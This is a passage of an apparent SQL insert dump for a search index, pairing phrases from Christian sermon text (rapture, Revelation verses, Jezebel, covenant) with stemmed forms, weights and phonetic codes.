(269030, 'pharisees and', 'pharise and', 0, 1, 1.4333, 'P6253', 1, '*'),
(269031, 'pharisees and sadducees', 'pharise and sadducees', 0, 1, 1.7667, 'P6253232', 1, '*'),
(269032, 'place any', 'place any', 0, 1, 1.3, 'P425', 1, '*'),
(269033, 'place any moment', 'place any moment', 0, 1, 1.5333, 'P4253', 1, '*'),
(269034, 'possess greed', 'possess greed', 0, 1, 1.4333, 'P263', 1, '*'),
(269035, 'possess greed 1', 'possess greed 1', 0, 1, 1.5, 'P263', 1, '*'),
(269036, 'power thereof', 'power thereof', 0, 1, 1.4333, 'P6361', 1, '*'),
(269037, 'power thereof being', 'power thereof being', 0, 1, 1.6333, 'P636152', 1, '*'),
(269038, 'prepared for rapture', 'prepar for rapture', 0, 1, 1.6667, 'P616316136', 1, '*'),
(269039, 'profanity', 'profan', 0, 0, 0.6, 'P6153', 1, '*'),
(269040, 'profanity matt.12', 'profan matt.12', 0, 1, 1.5667, 'P615353', 1, '*'),
(269041, 'profanity matt.12 13', 'profan matt.12 13', 0, 1, 1.6667, 'P615353', 1, '*'),
(269042, 'pursuit', 'pursuit', 0, 0, 0.4667, 'P623', 1, '*'),
(269043, 'pursuit of', 'pursuit of', 0, 1, 1.3333, 'P6231', 1, '*'),
(269044, 'pursuit of wealth', 'pursuit of wealth', 0, 1, 1.5667, 'P623143', 1, '*'),
(269045, 'put end', 'put end', 0, 1, 1.2333, 'P353', 1, '*'),
(269046, 'put end to', 'put end to', 0, 1, 1.3333, 'P353', 1, '*'),
(269047, 'quick', 'quick', 0, 0, 0.3333, 'Q000', 1, '*'),
(269048, 'quick take', 'quick take', 0, 1, 1.3333, 'Q320', 1, '*'),
(269049, 'quick take away', 'quick take away', 0, 1, 1.5, 'Q320', 1, '*'),
(269050, 'rapture god', 'raptur god', 0, 1, 1.3667, 'R13623', 1, '*'),
(269051, 'rapture god bless', 'raptur god bless', 0, 1, 1.5667, 'R13623142', 1, '*'),
(269052, 'rapture is', 'raptur is', 0, 1, 1.3333, 'R1362', 1, '*'),
(269053, 'rapture is a', 'raptur is a', 0, 1, 1.4, 'R1362', 1, '*'),
(269054, 'rapture leaving', 'raptur leaving', 0, 1, 1.5, 'R1364152', 1, '*'),
(269055, 'rapture leaving your', 'raptur leaving your', 0, 1, 1.6667, 'R13641526', 1, '*'),
(269056, 'rapture of saints', 'raptur of saints', 0, 1, 1.5667, 'R13612532', 1, '*'),
(269057, 'rapture still', 'raptur still', 0, 1, 1.4333, 'R136234', 1, '*'),
(269058, 'rapture still differs', 'raptur still differs', 0, 1, 1.7, 'R1362343162', 1, '*'),
(269059, 'rebellious these', 'rebelli these', 0, 1, 1.5333, 'R14232', 1, '*'),
(269060, 'rebellious these have', 'rebelli these have', 0, 1, 1.7, 'R142321', 1, '*'),
(269061, 'religious yet', 'religi yet', 0, 1, 1.4333, 'R423', 1, '*'),
(269062, 'religious yet rebellious', 'religi yet rebellious', 0, 1, 1.8, 'R4236142', 1, '*'),
(269063, 'remain shall', 'remain shall', 0, 1, 1.4, 'R524', 1, '*'),
(269064, 'remain shall be', 'remain shall be', 0, 1, 1.5, 'R5241', 1, '*'),
(269065, 'remaining in', 'remain in', 0, 1, 1.4, 'R525', 1, '*'),
(269066, 'remaining in your', 'remain in your', 0, 1, 1.5667, 'R5256', 1, '*'),
(269067, 'rev 2', 'rev 2', 0, 1, 1.1667, 'R100', 1, '*'),
(269068, 'rev 2 14-15', 'rev 2 14-15', 0, 1, 1.3667, 'R100', 1, '*'),
(269069, 'rev 2 20-23', 'rev 2 20-23', 0, 1, 1.3667, 'R100', 1, '*'),
(269070, 'rev 2 4-5', 'rev 2 4-5', 0, 1, 1.3, 'R100', 1, '*'),
(269071, 'rev 2 9', 'rev 2 9', 0, 1, 1.2333, 'R100', 1, '*'),
(269072, 'rev 3 17-18', 'rev 3 17-18', 0, 1, 1.3667, 'R100', 2, '*'),
(269073, 'rev.3', 'rev.3', 0, 0, 0.3333, 'R100', 1, '*'),
(269074, 'rev.3 1-4', 'rev.3 1-4', 0, 1, 1.3, 'R100', 1, '*'),
(269075, 'rev.3 1-4 2tim', 'rev.3 1-4 2tim', 0, 1, 1.4667, 'R135', 1, '*'),
(269076, 'rev.3 15-16', 'rev.3 15-16', 0, 1, 1.3667, 'R100', 1, '*'),
(269077, 'rev.3 15-16 mark', 'rev.3 15-16 mark', 0, 1, 1.5333, 'R1562', 1, '*'),
(269078, 'rev.9', 'rev.9', 0, 0, 0.3333, 'R100', 1, '*'),
(269079, 'rev.9 11-21', 'rev.9 11-21', 0, 1, 1.3667, 'R100', 1, '*'),
(269080, 'rev.9 11-21 zech', 'rev.9 11-21 zech', 0, 1, 1.5333, 'R120', 1, '*'),
(269081, 'riches pursuit', 'rich pursuit', 0, 1, 1.4667, 'R21623', 1, '*'),
(269082, 'riches pursuit of', 'rich pursuit of', 0, 1, 1.5667, 'R216231', 1, '*'),
(269083, 'right standing', 'right standing', 0, 1, 1.4667, 'R23235352', 1, '*'),
(269084, 'right standing with', 'right standing with', 0, 1, 1.6333, 'R232353523', 1, '*'),
(269085, 'sacred or', 'sacr or', 0, 1, 1.3, 'S636', 1, '*'),
(269086, 'sacred or inviolable', 'sacr or inviolable', 0, 1, 1.6667, 'S63651414', 1, '*'),
(269087, 'sadducees', 'sadduce', 0, 0, 0.6, 'S320', 1, '*'),
(269088, 'sadducees despite', 'sadduce despite', 0, 1, 1.5667, 'S323213', 1, '*'),
(269089, 'sadducees despite the', 'sadduce despite the', 0, 1, 1.7, 'S323213', 1, '*'),
(269090, 'saints is', 'saint is', 0, 1, 1.3, 'S532', 1, '*'),
(269091, 'saints is found', 'saint is found', 0, 1, 1.5, 'S532153', 1, '*'),
(269092, 'saints to', 'saint to', 0, 1, 1.3, 'S5323', 1, '*'),
(269093, 'saints to put', 'saint to put', 0, 1, 1.4333, 'S532313', 1, '*'),
(269094, 'sanctification', 'sanctif', 0, 0, 0.9333, 'S5231235', 1, '*'),
(269095, 'sanctification religious', 'sanctif religious', 0, 1, 1.8, 'S5231235642', 1, '*'),
(269096, 'sanctification religious yet', 'sanctif religious yet', 0, 1, 1.9333, 'S52312356423', 1, '*'),
(269097, 'sanctimonious', 'sanctimoni', 0, 0, 0.8667, 'S52352', 1, '*'),
(269098, 'sanctimonious without', 'sanctimoni without', 0, 1, 1.7, 'S523523', 1, '*'),
(269099, 'sanctimonious without sanctification', 'sanctimoni without sanctification', 0, 1, 2, 'S52352325231235', 1, '*'),
(269100, 'satan and his', 'satan and his', 0, 1, 1.4333, 'S3532', 1, '*'),
(269101, 'says in 1', 'sai in 1', 0, 1, 1.3, 'S500', 1, '*'),
(269102, 'says they', 'sai they', 0, 1, 1.3, 'S300', 1, '*'),
(269103, 'says they shall', 'sai they shall', 0, 1, 1.5, 'S324', 1, '*'),
(269104, 'scripture and', 'scriptur and', 0, 1, 1.4333, 'S613653', 1, '*'),
(269105, 'scripture and condemns', 'scriptur and condemns', 0, 1, 1.7333, 'S61365325352', 1, '*'),
(269106, 'seducer', 'seduc', 0, 0, 0.4667, 'S326', 1, '*'),
(269107, 'seducer rev', 'seduc rev', 0, 1, 1.3667, 'S3261', 1, '*'),
(269108, 'seducer rev 2', 'seduc rev 2', 0, 1, 1.4333, 'S3261', 1, '*'),
(269109, 'seducing', 'seduc', 0, 0, 0.5333, 'S3252', 1, '*'),
(269110, 'seducing spirits', 'seduc spirits', 0, 1, 1.5333, 'S32521632', 1, '*'),
(269111, 'seducing spirits the', 'seduc spirits the', 0, 1, 1.6667, 'S325216323', 1, '*'),
(269112, 'see him', 'see him', 0, 1, 1.2333, 'S500', 1, '*'),
(269113, 'see him with', 'see him with', 0, 1, 1.4, 'S530', 1, '*'),
(269114, 'see take', 'see take', 0, 1, 1.2667, 'S320', 1, '*'),
(269115, 'see take not', 'see take not', 0, 1, 1.4, 'S3253', 1, '*'),
(269116, 'shall be caught', 'shall be caught', 0, 1, 1.5, 'S4123', 1, '*'),
(269117, 'shall not inherit', 'shall not inherit', 0, 1, 1.5667, 'S453563', 1, '*'),
(269118, 'shall see him', 'shall see him', 0, 1, 1.4333, 'S425', 1, '*'),
(269119, 'shall we', 'shall we', 0, 1, 1.2667, 'S400', 1, '*'),
(269120, 'shall we ever', 'shall we ever', 0, 1, 1.4333, 'S416', 1, '*'),
(269121, 'showing', 'show', 0, 0, 0.4667, 'S520', 1, '*'),
(269122, 'showing contempt', 'show contempt', 0, 1, 1.5333, 'S5253513', 1, '*'),
(269123, 'showing contempt for', 'show contempt for', 0, 1, 1.6667, 'S525351316', 1, '*'),
(269124, 'sin and defilement', 'sin and defilement', 0, 1, 1.6, 'S531453', 1, '*'),
(269125, 'so shall', 'so shall', 0, 1, 1.2667, 'S400', 1, '*'),
(269126, 'so shall we', 'so shall we', 0, 1, 1.3667, 'S400', 1, '*'),
(269127, 'something considered', 'someth considered', 0, 1, 1.6667, 'S535252363', 1, '*'),
(269128, 'something considered sacred', 'someth considered sacred', 0, 1, 1.9, 'S535252363263', 1, '*'),
(269129, 'spirit of jezebel', 'spirit of jezebel', 0, 1, 1.5667, 'S1631214', 1, '*'),
(269130, 'spirits the spirit', 'spirit the spirit', 0, 1, 1.6, 'S163232163', 1, '*'),
(269131, 'spiritually dead', 'spiritu dead', 0, 1, 1.5333, 'S16343', 1, '*'),
(269132, 'spiritually dead rev.3', 'spiritu dead rev.3', 0, 1, 1.7333, 'S1634361', 1, '*'),
(269133, 'standing with', 'stand with', 0, 1, 1.4333, 'S353523', 1, '*'),
(269134, 'standing with god', 'stand with god', 0, 1, 1.5667, 'S35352323', 1, '*'),
(269135, 'still any', 'still any', 0, 1, 1.3, 'S345', 1, '*'),
(269136, 'still any of', 'still any of', 0, 1, 1.4, 'S3451', 1, '*'),
(269137, 'still differs', 'still differs', 0, 1, 1.4333, 'S343162', 1, '*'),
(269138, 'still differs from', 'still differs from', 0, 1, 1.6, 'S343162165', 1, '*'),
(269139, 'story of elijah', 'stori of elijah', 0, 1, 1.5, 'S36142', 1, '*'),
(269140, 'strange and', 'strang and', 0, 1, 1.3667, 'S365253', 1, '*'),
(269141, 'strange and demonic', 'strang and demonic', 0, 1, 1.6333, 'S36525352', 1, '*'),
(269142, 'such like', 'such like', 0, 1, 1.3, 'S420', 1, '*'),
(269143, 'such like every', 'such like every', 0, 1, 1.5, 'S4216', 1, '*'),
(269144, 'suddenly', 'suddenli', 0, 0, 0.5333, 'S354', 1, '*'),
(269145, 'suddenly there', 'suddenli there', 0, 1, 1.4667, 'S35436', 1, '*'),
(269146, 'suddenly there appeared', 'suddenli there appeared', 0, 1, 1.7667, 'S35436163', 1, '*'),
(269147, 'take away', 'take away', 0, 1, 1.3, 'T200', 1, '*'),
(269148, 'take away hence', 'take away hence', 0, 1, 1.5, 'T252', 1, '*'),
(269149, 'take not', 'take not', 0, 1, 1.2667, 'T253', 1, '*'),
(269150, 'take not minding', 'take not minding', 0, 1, 1.5333, 'T2535352', 1, '*'),
(269151, 'take place any', 'take place any', 0, 1, 1.4667, 'T21425', 1, '*'),
(269152, 'term meaning', 'term meaning', 0, 1, 1.4, 'T652', 1, '*'),
(269153, 'term meaning “a', 'term meaning “a', 0, 1, 1.5, 'T652', 1, '*'),
(269154, 'testament story', 'testament story', 0, 1, 1.5, 'T2353236', 1, '*'),
(269155, 'testament story of', 'testament story of', 0, 1, 1.6, 'T23532361', 1, '*'),
(269156, 'text 1thes4', 'text 1thes4', 0, 1, 1.3667, 'T232', 1, '*'),
(269157, 'text 1thes4 14-18', 'text 1thes4 14-18', 0, 1, 1.5667, 'T232', 1, '*'),
(269158, 'that are alive', 'that are alive', 0, 1, 1.4667, 'T641', 1, '*'),
(269159, 'that are good', 'that are good', 0, 1, 1.4333, 'T623', 1, '*'),
(269160, 'that can hinder', 'that can hinder', 0, 1, 1.5, 'T2536', 1, '*'),
(269161, 'that directly', 'that directly', 0, 1, 1.4333, 'T6234', 1, '*'),
(269162, 'that directly conflict', 'that directly conflict', 0, 1, 1.7333, 'T6234251423', 1, '*'),
(269163, 'that jesus came', 'that jesus came', 0, 1, 1.5, 'T250', 1, '*'),
(269164, 'that permits', 'that permits', 0, 1, 1.4, 'T16532', 1, '*'),
(269165, 'that permits what', 'that permits what', 0, 1, 1.5667, 'T165323', 1, '*'),
(269166, 'that violates the', 'that violates the', 0, 1, 1.5667, 'T14323', 1, '*'),
(269167, 'the above factors', 'the above factors', 0, 1, 1.5667, 'T12362', 1, '*'),
(269168, 'the act of', 'the act of', 0, 1, 1.3333, 'T231', 1, '*'),
(269169, 'the air and', 'the air and', 0, 1, 1.3667, 'T653', 1, '*'),
(269170, 'the believers in', 'the believers in', 0, 1, 1.5333, 'T141625', 1, '*'),
(269171, 'the catching', 'the catching', 0, 1, 1.4, 'T23252', 1, '*'),
(269172, 'the catching up', 'the catching up', 0, 1, 1.5, 'T232521', 1, '*'),
(269173, 'the church this', 'the church this', 0, 1, 1.5, 'T26232', 1, '*'),
(269174, 'the clouds', 'the clouds', 0, 1, 1.3333, 'T2432', 1, '*'),
(269175, 'the clouds to', 'the clouds to', 0, 1, 1.4333, 'T24323', 1, '*'),
(269176, 'the dead in', 'the dead in', 0, 1, 1.3667, 'T500', 1, '*'),
(269177, 'the deceitfulness', 'the deceitfulness', 0, 1, 1.5667, 'T231452', 1, '*'),
(269178, 'the deceitfulness of', 'the deceitfulness of', 0, 1, 1.6667, 'T2314521', 1, '*'),
(269179, 'the earth they', 'the earth they', 0, 1, 1.4667, 'T630', 1, '*'),
(269180, 'the good works', 'the good works', 0, 1, 1.4667, 'T2362', 1, '*'),
(269181, 'the lord eph', 'the lord eph', 0, 1, 1.4, 'T4631', 1, '*'),
(269182, 'the lord the', 'the lord the', 0, 1, 1.4, 'T463', 1, '*'),
(269183, 'the misrule', 'the misrule', 0, 1, 1.3667, 'T5264', 1, '*'),
(269184, 'the misrule of', 'the misrule of', 0, 1, 1.4667, 'T52641', 1, '*'),
(269185, 'the pharisees and', 'the pharisees and', 0, 1, 1.5667, 'T16253', 1, '*'),
(269186, 'the power thereof', 'the power thereof', 0, 1, 1.5667, 'T16361', 1, '*'),
(269187, 'the rapture god', 'the rapture god', 0, 1, 1.5, 'T613623', 1, '*'),
(269188, 'the rapture leaving', 'the rapture leaving', 0, 1, 1.6333, 'T61364152', 1, '*'),
(269189, 'the scripture and', 'the scripture and', 0, 1, 1.5667, 'T2613653', 1, '*'),
(269190, 'the very', 'the very', 0, 1, 1.2667, 'T160', 1, '*'),
(269191, 'the very next', 'the very next', 0, 1, 1.4333, 'T16523', 1, '*'),
(269192, 'the visible', 'the visible', 0, 1, 1.3667, 'T1214', 1, '*'),
(269193, 'the visible in', 'the visible in', 0, 1, 1.4667, 'T12145', 1, '*'),
(269194, 'the written', 'the written', 0, 1, 1.3667, 'T635', 1, '*'),
(269195, 'the written word', 'the written word', 0, 1, 1.5333, 'T63563', 1, '*'),
(269196, 'their parents in', 'their parents in', 0, 1, 1.5333, 'T6165325', 1, '*'),
(269197, 'then we', 'then we', 0, 1, 1.2333, 'T500', 1, '*'),
(269198, 'then we that', 'then we that', 0, 1, 1.4, 'T530', 1, '*'),
(269199, 'then we which', 'then we which', 0, 1, 1.4333, 'T520', 1, '*'),
(269200, 'there appeared', 'there appeared', 0, 1, 1.4667, 'T6163', 1, '*'),
(269201, 'there appeared a', 'there appeared a', 0, 1, 1.5333, 'T6163', 1, '*'),
(269202, 'there still', 'there still', 0, 1, 1.3667, 'T6234', 1, '*'),
(269203, 'there still any', 'there still any', 0, 1, 1.5, 'T62345', 1, '*'),
(269204, 'thereof', 'thereof', 0, 0, 0.4667, 'T610', 1, '*'),
(269205, 'thereof being', 'thereof being', 0, 1, 1.4333, 'T6152', 1, '*'),
(269206, 'thereof being sanctimonious', 'thereof being sanctimonious', 0, 1, 1.9, 'T615252352', 1, '*'),
(269207, 'these are doctrines', 'these are doctrines', 0, 1, 1.6333, 'T26323652', 1, '*'),
(269208, 'these have', 'these have', 0, 1, 1.3333, 'T210', 1, '*'),
(269209, 'these have an', 'these have an', 0, 1, 1.4333, 'T215', 1, '*'),
(269210, 'these remaining', 'these remaining', 0, 1, 1.5, 'T2652', 1, '*'),
(269211, 'these remaining in', 'these remaining in', 0, 1, 1.6, 'T26525', 1, '*'),
(269212, 'thess', 'thess', 0, 0, 0.3333, 'T200', 1, '*'),
(269213, 'thess 2', 'thess 2', 0, 1, 1.2333, 'T200', 1, '*'),
(269214, 'thess 2 1', 'thess 2 1', 0, 1, 1.3, 'T200', 1, '*'),
(269215, 'thess 2 9', 'thess 2 9', 0, 1, 1.3, 'T200', 1, '*'),
(269216, 'thessalonians 4', 'thessalonian 4', 0, 1, 1.5, 'T2452', 1, '*'),
(269217, 'thessalonians 4 17', 'thessalonian 4 17', 0, 1, 1.6, 'T2452', 1, '*'),
(269218, 'they are full', 'thei are full', 0, 1, 1.4333, 'T614', 1, '*'),
(269219, 'they are spiritually', 'thei are spiritually', 0, 1, 1.6667, 'T621634', 1, '*'),
(269220, 'they despised', 'thei despised', 0, 1, 1.4333, 'T2123', 1, '*'),
(269221, 'they despised him', 'thei despised him', 0, 1, 1.5667, 'T21235', 1, '*'),
(269222, 'they shall', 'thei shall', 0, 1, 1.3333, 'T240', 1, '*'),
(269223, 'they shall not', 'thei shall not', 0, 1, 1.4667, 'T2453', 1, '*'),
(269224, 'thing about it', 'thing about it', 0, 1, 1.4667, 'T5213', 1, '*'),
(269225, 'things you have', 'thing you have', 0, 1, 1.5, 'T521', 1, '*'),
(269226, 'those that are', 'those that are', 0, 1, 1.4667, 'T236', 1, '*'),
(269227, 'tim 4', 'tim 4', 0, 1, 1.1667, 'T500', 1, '*'),
(269228, 'tim 4 1', 'tim 4 1', 0, 1, 1.2333, 'T500', 1, '*'),
(269229, 'tim.4', 'tim.4', 0, 0, 0.3333, 'T500', 1, '*'),
(269230, 'tim.4 1', 'tim.4 1', 0, 1, 1.2333, 'T500', 1, '*'),
(269231, 'tim.4 1 giving', 'tim.4 1 giving', 0, 1, 1.4667, 'T52152', 1, '*'),
(269232, 'time calendar', 'time calendar', 0, 1, 1.4333, 'T524536', 1, '*'),
(269233, 'time calendar is', 'time calendar is', 0, 1, 1.5333, 'T5245362', 1, '*'),
(269234, 'timothy 3', 'timothi 3', 0, 1, 1.3, 'T530', 1, '*'),
(269235, 'timothy 3 1-4', 'timothi 3 1-4', 0, 1, 1.4333, 'T530', 1, '*'),
(269236, 'to do on', 'to do on', 0, 1, 1.2667, 'T500', 1, '*'),
(269237, 'to honour', 'to honour', 0, 1, 1.3, 'T560', 1, '*'),
(269238, 'to honour and', 'to honour and', 0, 1, 1.4333, 'T5653', 1, '*'),
(269239, 'to make the', 'to make the', 0, 1, 1.3667, 'T523', 1, '*'),
(269240, 'to meet', 'to meet', 0, 1, 1.2333, 'T530', 1, '*'),
(269241, 'to meet the', 'to meet the', 0, 1, 1.3667, 'T530', 1, '*'),
(269242, 'to obtain and', 'to obtain and', 0, 1, 1.4333, 'T1353', 1, '*'),
(269243, 'to parents', 'to parents', 0, 1, 1.3333, 'T16532', 1, '*'),
(269244, 'to parents god', 'to parents god', 0, 1, 1.4667, 'T165323', 1, '*'),
(269245, 'to put end', 'to put end', 0, 1, 1.3333, 'T1353', 1, '*'),
(269246, 'to the catching', 'to the catching', 0, 1, 1.5, 'T23252', 1, '*'),
(269247, 'to the misrule', 'to the misrule', 0, 1, 1.4667, 'T5264', 1, '*'),
(269248, 'to the will', 'to the will', 0, 1, 1.3667, 'T400', 1, '*'),
(269249, 'to tolerate', 'to tolerate', 0, 1, 1.3667, 'T463', 1, '*'),
(269250, 'to tolerate evil', 'to tolerate evil', 0, 1, 1.5333, 'T46314', 1, '*'),
(269251, 'to witchcraft', 'to witchcraft', 0, 1, 1.4333, 'T2613', 1, '*'),
(269252, 'to witchcraft and', 'to witchcraft and', 0, 1, 1.5667, 'T261353', 1, '*'),
(269253, 'today to make', 'todai to make', 0, 1, 1.4333, 'T520', 1, '*'),
(269254, 'together with', 'togeth with', 0, 1, 1.4333, 'T2363', 1, '*'),
(269255, 'together with them', 'togeth with them', 0, 1, 1.6, 'T23635', 1, '*'),
(269256, 'tolerate', 'toler', 0, 0, 0.5333, 'T463', 1, '*'),
(269257, 'tolerate evil', 'toler evil', 0, 1, 1.4333, 'T46314', 1, '*'),
(269258, 'tolerate evil things', 'toler evil things', 0, 1, 1.6667, 'T46314352', 1, '*'),
(269259, 'towards something', 'toward something', 0, 1, 1.5667, 'T6325352', 1, '*'),
(269260, 'towards something considered', 'toward something considered', 0, 1, 1.9333, 'T632535252363', 1, '*'),
(269261, 'type of', 'type of', 0, 1, 1.2333, 'T100', 1, '*'),
(269262, 'type of christ', 'type of christ', 0, 1, 1.4667, 'T12623', 1, '*'),
(269263, 'unlisted', 'unlist', 0, 0, 0.5333, 'U5423', 1, '*'),
(269264, 'unlisted work', 'unlist work', 0, 1, 1.4333, 'U542362', 1, '*'),
(269265, 'unlisted work of', 'unlist work of', 0, 1, 1.5333, 'U5423621', 1, '*'),
(269266, 'unto strange', 'unto strange', 0, 1, 1.4, 'U5323652', 1, '*'),
(269267, 'unto strange and', 'unto strange and', 0, 1, 1.5333, 'U532365253', 1, '*'),
(269268, 'up of', 'up of', 0, 1, 1.1667, 'U100', 1, '*'),
(269269, 'up of all', 'up of all', 0, 1, 1.3, 'U140', 1, '*'),
(269270, 'up together', 'up together', 0, 1, 1.3667, 'U13236', 1, '*'),
(269271, 'up together with', 'up together with', 0, 1, 1.5333, 'U132363', 1, '*'),
(269272, 'using the', 'us the', 0, 1, 1.3, 'U2523', 1, '*'),
(269273, 'using the above', 'us the above', 0, 1, 1.5, 'U25231', 1, '*'),
(269274, 'very next', 'veri next', 0, 1, 1.3, 'V6523', 1, '*'),
(269275, 'very next event', 'veri next event', 0, 1, 1.5, 'V6523153', 1, '*'),
(269276, 'violates the', 'violat the', 0, 1, 1.4, 'V4323', 1, '*'),
(269277, 'violates the scripture', 'violat the scripture', 0, 1, 1.7333, 'V432326136', 1, '*'),
(269278, 'visible', 'visibl', 0, 0, 0.4667, 'V214', 1, '*'),
(269279, 'visible in', 'visibl in', 0, 1, 1.3333, 'V2145', 1, '*'),
(269280, 'visible in which', 'visibl in which', 0, 1, 1.5333, 'V21452', 1, '*'),
(269281, 'we ever', 'we ever', 0, 1, 1.2333, 'W160', 1, '*'),
(269282, 'we ever be', 'we ever be', 0, 1, 1.3333, 'W161', 1, '*'),
(269283, 'we have a', 'we have a', 0, 1, 1.3, 'W100', 1, '*'),
(269284, 'we that', 'we that', 0, 1, 1.2333, 'W300', 1, '*'),
(269285, 'we that are', 'we that are', 0, 1, 1.3667, 'W360', 1, '*'),
(269286, 'we which', 'we which', 0, 1, 1.2667, 'W200', 1, '*'),
(269287, 'we which are', 'we which are', 0, 1, 1.4, 'W260', 1, '*'),
(269288, 'wealth at', 'wealth at', 0, 1, 1.3, 'W430', 1, '*'),
(269289, 'wealth at the', 'wealth at the', 0, 1, 1.4333, 'W430', 1, '*'),
(269290, 'what god forbids', 'what god forbids', 0, 1, 1.5333, 'W32316132', 1, '*'),
(269291, 'when you backslide', 'when you backslide', 0, 1, 1.6, 'W51243', 1, '*'),
(269292, 'which are alive', 'which are alive', 0, 1, 1.5, 'W2641', 1, '*'),
(269293, 'which every', 'which every', 0, 1, 1.3667, 'W216', 1, '*'),
(269294, 'which every eye', 'which every eye', 0, 1, 1.5, 'W216', 1, '*'),
(269295, 'who owns', 'who owns', 0, 1, 1.2667, 'W520', 1, '*'),
(269296, 'who owns it', 'who owns it', 0, 1, 1.3667, 'W523', 1, '*'),
(269297, 'will arise', 'will arise', 0, 1, 1.3333, 'W462', 1, '*'),
(269298, 'will arise first', 'will arise first', 0, 1, 1.5333, 'W4621623', 1, '*'),
(269299, 'witchcraft', 'witchcraft', 0, 0, 0.6667, 'W32613', 1, '*'),
(269300, 'witchcraft and', 'witchcraft and', 0, 1, 1.4667, 'W3261353', 1, '*'),
(269301, 'witchcraft and seducing', 'witchcraft and seducing', 0, 1, 1.7667, 'W326135323252', 1, '*'),
(269302, 'with christ at', 'with christ at', 0, 1, 1.4667, 'W32623', 1, '*'),
(269303, 'with christ in', 'with christ in', 0, 1, 1.4667, 'W326235', 1, '*'),
(269304, 'with god rev', 'with god rev', 0, 1, 1.4, 'W32361', 1, '*'),
(269305, 'with his saints', 'with his saints', 0, 1, 1.5, 'W32532', 1, '*'),
(269306, 'with the written', 'with the written', 0, 1, 1.5333, 'W3635', 1, '*'),
(269307, 'with them in', 'with them in', 0, 1, 1.4, 'W350', 1, '*'),
(269308, 'without sanctification', 'without sanctification', 0, 1, 1.7333, 'W325231235', 1, '*'),
(269309, 'without sanctification religious', 'without sanctification religious', 0, 1, 2, 'W325231235642', 1, '*'),
(269310, 'work of the', 'work of the', 0, 1, 1.3667, 'W6213', 2, '*'),
(269311, 'works of flesh', 'work of flesh', 0, 1, 1.4667, 'W62142', 1, '*'),
(269312, 'works that jesus', 'work that jesus', 0, 1, 1.5333, 'W6232', 1, '*'),
(269313, 'written word', 'written word', 0, 1, 1.4, 'W63563', 1, '*'),
(269314, 'written word of', 'written word of', 0, 1, 1.5, 'W635631', 1, '*'),
(269315, 'yet rebellious', 'yet rebellious', 0, 1, 1.4667, 'Y36142', 1, '*'),
(269316, 'yet rebellious these', 'yet rebellious these', 0, 1, 1.6667, 'Y3614232', 1, '*'),
(269317, 'you backslide', 'you backslide', 0, 1, 1.4333, 'Y1243', 1, '*'),
(269318, 'you backslide and', 'you backslide and', 0, 1, 1.5667, 'Y124353', 1, '*'),
(269319, 'you have one', 'you have one', 0, 1, 1.4, 'Y150', 1, '*'),
(269320, 'you prepared', 'you prepared', 0, 1, 1.4, 'Y16163', 1, '*'),
(269321, 'you prepared for', 'you prepared for', 0, 1, 1.5333, 'Y1616316', 1, '*'),
(269322, 'your conscience using', 'your conscience using', 0, 1, 1.7, 'Y62525252', 1, '*'),
(269323, 'your first love', 'your first love', 0, 1, 1.5, 'Y6162341', 1, '*'),
(269324, 'your life take', 'your life take', 0, 1, 1.4667, 'Y64132', 1, '*'),
(269325, 'your parents', 'your parents', 0, 1, 1.4, 'Y616532', 1, '*'),
(269326, 'your parents in', 'your parents in', 0, 1, 1.5, 'Y6165325', 1, '*'),
(269327, 'zech', 'zech', 0, 0, 0.2667, 'Z000', 1, '*'),
(269328, 'zech 14', 'zech 14', 0, 1, 1.2333, 'Z000', 1, '*'),
(269329, 'zech 14 1-5', 'zech 14 1-5', 0, 1, 1.3667, 'Z000', 1, '*'),
(269330, '“a', '“a', 0, 0, 0.1333, '“000', 1, '*'),
(269331, '“a quick', '“a quick', 0, 1, 1.2667, '“200', 1, '*'),
(269332, '“a quick take', '“a quick take', 0, 1, 1.4333, '“232', 1, '*'),
(269384, '1 the sword', '1 the sword', 0, 1, 1.3667, 'T263', 1, '*'),
(269385, '15 01', '15 01', 0, 1, 1.1667, '', 1, '*'),
(269386, '15 01 2017', '15 01 2017', 0, 1, 1.3333, '', 1, '*'),
(269387, '16 father', '16 father', 0, 1, 1.3, 'F360', 1, '*'),
(269388, '16 father s', '16 father s', 0, 1, 1.3667, 'F362', 1, '*'),
(269389, '2 take', '2 take', 0, 1, 1.2, 'T200', 1, '*'),
(269390, '2 take a', '2 take a', 0, 1, 1.2667, 'T200', 1, '*'),
(269391, '2017 1', '2017 1', 0, 1, 1.2, '', 1, '*'),
(269392, '2017 1 the', '2017 1 the', 0, 1, 1.3333, 'T000', 1, '*'),
(269393, '2017 going', '2017 going', 0, 1, 1.3333, 'G520', 1, '*'),
(269394, '2017 going from', '2017 going from', 0, 1, 1.5, 'G52165', 1, '*'),
(269395, '3 sure', '3 sure', 0, 1, 1.2, 'S600', 1, '*'),
(269396, '3 sure mercies', '3 sure mercies', 0, 1, 1.4667, 'S6562', 1, '*'),
(269397, '4 the', '4 the', 0, 1, 1.1667, 'T000', 1, '*'),
(269398, '4 the blessing', '4 the blessing', 0, 1, 1.4667, 'T14252', 1, '*'),
(269399, 'a banker a', 'a banker a', 0, 1, 1.3333, 'A1526', 1, '*'),
(269400, 'a carrier', 'a carrier', 0, 1, 1.3, 'A260', 1, '*'),
(269401, 'a carrier of', 'a carrier of', 0, 1, 1.4, 'A261', 1, '*'),
(269402, 'a covenant', 'a covenant', 0, 1, 1.3333, 'A2153', 1, '*'),
(269403, 'a covenant between', 'a covenant between', 0, 1, 1.6, 'A2153135', 1, '*'),
(269404, 'a covenant child', 'a covenant child', 0, 1, 1.5333, 'A2153243', 1, '*'),
(269405, 'a covenant keeping', 'a covenant keeping', 0, 1, 1.6, 'A21532152', 1, '*'),
(269406, 'a covenant mindset', 'a covenant mindset', 0, 1, 1.6, 'A21535323', 1, '*'),
(269407, 'a covenant with', 'a covenant with', 0, 1, 1.5, 'A2153', 1, '*'),
(269408, 'a doctor', 'a doctor', 0, 1, 1.2667, 'A3236', 2, '*'),
(269409, 'a doctor a', 'a doctor a', 0, 1, 1.3333, 'A3236', 1, '*'),
(269410, 'a people blessed', 'a people blessed', 0, 1, 1.5333, 'A141423', 1, '*'),
(269411, 'a positive', 'a positive', 0, 1, 1.3333, 'A1231', 1, '*'),
(269412, 'a positive outcome', 'a positive outcome', 0, 1, 1.6, 'A1231325', 1, '*'),
(269413, 'a supernatural', 'a supernatural', 0, 1, 1.4667, 'A2165364', 1, '*'),
(269414, 'a supernatural force', 'a supernatural force', 0, 1, 1.6667, 'A2165364162', 1, '*'),
(269415, 'a supernatural influence', 'a supernatural influence', 0, 1, 1.8, 'A216536451452', 1, '*'),
(269416, 'action', 'action', 0, 0, 0.4, 'A235', 2, '*'),
